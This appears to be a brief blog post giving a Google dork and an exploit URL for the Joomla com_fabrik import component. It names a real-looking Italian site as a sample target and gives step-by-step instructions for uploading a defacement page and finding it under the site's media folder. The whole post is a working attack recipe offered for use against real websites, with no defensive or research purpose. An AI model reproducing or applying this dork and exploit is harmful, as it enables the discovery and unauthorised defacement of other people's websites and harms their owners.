Google Dork : inurl:index.php?option=com_fabrik
or
index.php?option=com_fabrik
Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sample:
http://www.usatovip.it/= add exploit
now it looks like :
http://www.usatovip.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Browse and upload your deface page ,When error appears just ignore it
You will access your deface page here :
http://VictimeSite.com/media/yourdeface.html
http://VictimeSite.com/media/yourdeface.html
Then You Can Find your File here :
http://www.VictimeSite.com/media/yourdeface.html
Aucun commentaire:
Enregistrer un commentaire